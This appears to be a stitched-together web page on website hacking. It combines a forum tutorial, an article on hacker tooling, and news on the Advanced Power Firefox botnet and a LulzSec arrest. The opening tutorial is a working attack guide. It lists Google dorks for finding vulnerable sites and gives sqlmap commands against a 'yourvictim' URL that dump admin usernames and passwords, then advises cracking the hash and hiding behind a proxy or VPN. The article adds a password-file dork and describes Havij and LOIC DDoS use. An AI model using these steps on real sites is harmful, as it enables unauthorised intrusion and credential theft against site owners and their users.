Hack Website Using SqlMap | Kali Linux

In this tutorial I am going to show you how to hack a website with slqmap on Kali Linux.

Introduction
[*]Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. This is all about sqlmap. 
Now follow my steps to hack a website using sqlmap.

Step 1
[*]Find Sql vulnerable site. 
I will give you some dorks which may help you finding websites vulnerable to Sql Injection.

Code:

]inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=

Step 2
[*]Test if the website is vulnerable
]To test if the website is vulnerable to Sqli just add " ' " at the end of the url. Like on the image below:



And press enter. If error appears like on the image below it means the website is vulnerable. 




(I'm not going to explain advanced ways to check the website for sql vulnerabiities because there are plenty of tutuorials about that on CHF)

Ok, so we found the target. Now let's go ahed.

Step 3
[*]Injection
Type this command in the terminal and hit enter like on the image below:

Code:

sqlmap -u "www.yourtaget.com/page.php?id=1" --dbs

(Insert the url that we checked for Sql Vulnerability)

Image has been scaled down 6% (700x460). Click this bar to view original image (741x486). Click image to open in new window.

Now we will get the database name of the website.

Image has been scaled down 6% (700x460). Click this bar to view original image (741x486). Click image to open in new window.

We got the two database ohridhot_ohrid
and information_schema we will select ohridhot_ohrid
database.

Let's get the tables of that database.
For that we need to enter this command on terminal and after that hit Enter. 

Code:

sqlmap -u "http://www.yourvictim/page.php?id=1" -D ohridhot_ohrid --tables

Image has been scaled down 4% (700x49). Click this bar to view original image (723x50). Click image to open in new window.

Now we will get the tables list which is stored in the database we selected.

Image has been scaled down 3% (700x257). Click this bar to view original image (717x263). Click image to open in new window.

Now lets grab the columns from the admin table , type on terminal:

Code:

sqlmap -u "http://www.yourvictim/page.php?id=1" -D ohridhot_ohrid -T admin --columns

Now we got the columns and we got user and pass like on the image below

Image has been scaled down 1% (700x130). Click this bar to view original image (703x130). Click image to open in new window.

Now let's grab the user and pass

Code:

sqlmap -u "http://www.yourvictim/page.php?id=1" -D ohridhot_ohrid -T admin -C user,pass --dump

Now we have to decrypt the hash , there are also tutorial about hash decryption on CHF.
The only thing which is left now is to find the admin page and remember to use Proxy/Vpn !

[*]Directory of sqlmap on Kali Linux
Places -> Computer -> Filesystem -> usr -> share -> sqlmap -> output


That's all , I hope you enjoyed the tutorial. 

Credit : CrackHackForum

Nowadays it’s easy to hack a website in just four steps

Till yesteryears it required Tech Geeks to have an above average knowledge to hack a website but these days it has become a child’s play. Like conventional searches, you can Google out the tools required to plan a Hack-Attack on a website and with a little effort you can execute the same with ease. Here it is, in 4 easy steps, how hackers execute it.

Step 1: Identifying

The Hacktivists first identify their target website which they want to attack upon. They first qualify the website, according to the vulnerability level, they wish to attack. Checking the vulnerability of the website allows the hacker to prepare tools and techniques required to bring down the website.

Hackers generally use Google Dork, or Google Hacking, to execute a vulnerability check against these easy-to-hack websites. It was very recent that a hacker posted a list of 5,000 such websites which were really easy to be attacked. If they don’t wish to Google it out, they can Bing it. This tool is heaven for hackers as it helps in qualifying such websites.

Hackers have a ready-to-refer index of Dorks which points out the websites having a particular vulnerability. Right from passwords to Login credentials, there is Dork available for everything. They would Google “intitle:”Index of” master.passwd” which will return them a file containing the passwords and then they have the list of potential victims ready with them to execute the hack.

Step 2: Spotting the vulnerabilities

Acunetix – a Windows based application to test the website – developed by a UK based company, was designed and is still in prominent use by developers to test the vulnerabilities in the website, but the technical expertise of hackers to this tool allows them access to point out the weakness levels of the website. Once the site is identified for attack, this tool is used by hackers to check the vulnerability of the website, as all websites qualified in level 1 may not be susceptible to attack.

Since the hackers have in-depth knowledge of the above mentioned software, they can not only crack the version from a trial one, but the cracked version is also available freely amongst the hacker community. Once they enter the URL or website address in this software they are able to point out the loopholes in the website and all they do is, move to step 3.

Step 3: The Attack on the website – SQL Injection

The SQL injection is the easiest and the most used way by hackers to hack into a website. It is used by hackers to hack into user accounts and steal information stored into its databases. This attack aims at information stealing using some lines of code of SQL (Structured Query List) which is a database programming language. The hacker’s don’t even have to learn the language for this attack, as there is an available software called “Havij” in the hacker forums where it is available free of cost. It comes as an easily useable application. Havij is originally a development from Iran. The word itself means carrot, a bad-slang for the word penis, ultimately meaning that the hack-ware helps penetrating a website.

Havij has 2 versions – paid and unpaid, both of them differential in powers of penetrating, although the paid version can be cracked and downloaded from other hacker forums. The interface of this software completely simple like any other windows application, which does its work when a newbie hacker just copies the link of the website needed to hack and pastes it into the application.

The tasks Havij can perform are very surprising. The best one for them and worst for the users of the website is called “Get”. It fetches all the data stored in the target website’s databases which range from usernames, passwords to phone numbers and bank details.

It is so easy for hackers that within a couple of minutes of their time, in which they can search, download, and use one or two automated hack-wares that allows them to access websites which are vulnerable to such attacks. Very much assured, that the websites of high profile companies like Google, Microsoft and Facebook are completely safe from such tools. As mentioned before, the vulnerability of the web is displayed by the attack made on Sony’s PlayStation Network which led to the leaking of their customers’ personal information in a very similar way.

Step 4: The DDoS – The A Game

SQL Injection has been used by the infamous hacktivist community – Anonymous for over a year now, but they tend to go forth with the DDoS when simple tools like the Havij don’t work. Again like the SQL (pronounced Sequel) Injection attack there are freely available tools for the DDoS as well.

As it appears, the DDoS is also as simple as the SQL Injection attack. The program used here is called the Low Orbit Ion Cannon (LOIC), which was brought to life by web developers for stress testing their own websites, but was later hijacked by hackers to attack the websites for non-social use.

The LOIC is available to the hackers freely on the website Source Forge. Again as simple as the Havij, the hackers just have to type in the link of the website they want to DDoS and the application does the rest. LOIC overloads the server of the target website with upto 200 requests per second.

Now again, the bigger websites can easily cope up with this type of an attack without crashing, most of the other websites cannot. Surely if a group of hackers, although newborn, dedicates itself to the job, it is very easy for them to complete it.

This type of technology horrifies the readers, but it is very simple to use by the hackers that they can even control it from their phones, meaning that they could well be watching a movie with their buddies in the cinema while attacking the website they want to bring down.

This is not an exhaustive list and processes how the hackers execute the act but there are many a tutorials on various hacking forums that teach how to perform the attack. There is no end to this notoriousness, in many cases a heinous crime, which has caused a loss of millions and millions of dollars to the world. So are you going to get your website checked through your developer today? May be today would be a real good day to get it done.

“Advance Power” Botnet enrolls Firefox users to hack the sites they visit

 

A highly strange botnet was found which has spellbound more than 12,000 computer systems while disguising itself as an authentic add-on for the famous Mozilla Firefox internet browser. The botnet forces the computers it gets on to analyze websites for their flaws in security.

This highly dangerous botnet, called “Advanced Power” by its developers, seems to have been into existence since May 2013 or even before that. Nobody is able to explain how the malware program is being spread to infect these many computers. It works in a way where it enslaves its victim PCs in a botnet and carries out SQLInjection attacks on any website that the victim visits.

The more serious property of this dark botnet is to extract passwords and other personal and sensitive information from the machines it has infected, but you may take a silent deep breath as this feature doesn’t appear to be in function on these infected hosts. Instead, this botnet is functioning only to use the slave Windows desktops as a wide scanning platform for searching for websites which can be exploited easily. 

According to the Administrative Panel of Advanced Power, at least 12,500 PCs are under infection and have helped in finding at around 18,000 Web Pages which are exploitable by SQL Injection Attacks.

The code being injected in the websites is from sources from the following two links:

1. Malwr Writeup
2. Virustotal Entry

We wouldn’t really recommend you going out looking for this malware!

Now on the infected PCs with the Mozilla Firefox browser, the bot code installs itself as a browser plug-in, calling itself “Microsoft .NET Framework Assisstant”, which is bogus and completely different from what the original plugin is. After installing itself on Mozilla, the bot code checks every page the user visits from the browser and tests them for any SQL Injection exploitability.

Hold Security LLC’s chief information security officer, Alex Holdencommented that the botnet program seems to have been developed to automate the hectic blind guesswork which gets involved in probing websites for SQL Injection Attacks vulnerabilities. Holden added to his comment that when testing of an application for SQL injection or any other vulnerability has to be performed, there is a small frame of reference as to the site’s functionality. Adding what he quoted, “You often don’t know or can’t see many user functions. And in some cases you need proper credentials to do it right. In this case, the hackers are using valid requests within many sites that end-users themselves are feeding them. This is a much bigger sample than you would normally get. By no means is it a full regression test, but it is a deep and innovative approach.”

Holden believes that the developers of Advanced Power are from the Czech Republic, as he noted that a few transliterated strings of text in the malware are auto-detected as Czech by Google Translate language program from Google.

Advanced Power is a solid example of how today’s infected systems are regularly used to take shots at destroying the defense systems guarding privacy and information of other users online. What makes the story more interesting is that there exists an Add-On for Firefox that runs the same test on the websites a user visits, but for reasons of testing security. Readers who are looking for a free tool to test their sites’ strength against such attacks should try using SQLmap which is an open source testing tool for penetration attacks like the SQL Injection itself.

Mozilla has recently issued a comment on the same, “We have disabled the fraudulent Microsoft .NET Framework Assistant add-on used by Advanced Power botnet,” by adding the fraudulent add-on to its blocked list. According to Mozilla, Firefox displays a message everyday once as it checks for blocked add-ons, while the browser is being used, and the blocking doesn’t require the user to take any actions to be in effect.

LulzSec hacker arrested over Sony attack

A second member of the LulzSec hacking was arrested by US authorities in connection with attacks on Sony Pictures Europe .

US police was arrested Raynaldo Rivera, 20, a member of the hacking group LulzSec, on charges that he took part in breach of the computer systems belonging to Sony Pictures Europe.

The indictment, which was unsealed on Tuesday, accuses Rivera and co-conspirators of stealing information from Sony Pictures Europe's computer systems in May and June 2011 using an SQL injection attack – which exploits flaws in the handing of data input for databases to take control of a system – against the studio's website.SQL injection, or SQLi, is an increasingly common technique used by hackers to break into systems.

The attack, which may have leaked credit card details for millions of users, has never been traced to any group – although Sony suggested not long afterwards that Anonymous might have been involved.Since then it has given no further details about who it suspects of carrying out the attack, and no data from the attack has ever been posted publicly.

"From a single injection we accessed EVERYTHING," the hackers said in a statement at the time. "Why do you put such faith in a company that allows itself to become open to these simple attacks?"

Authorities have said the Sony breach ultimately cost the company more than $600,000 (£378,000).
An accused British hacker, Ryan Cleary, 20, was indicted by a US grand jury in June on charges related to LulzSec attacks on several media companies, including Sony Pictures.

The rise of LulzSec saw a burst of similar "crews" aiming to hack sites, but since then Anonymous has focussed on providing an outlet for documents released by WikiLeaks.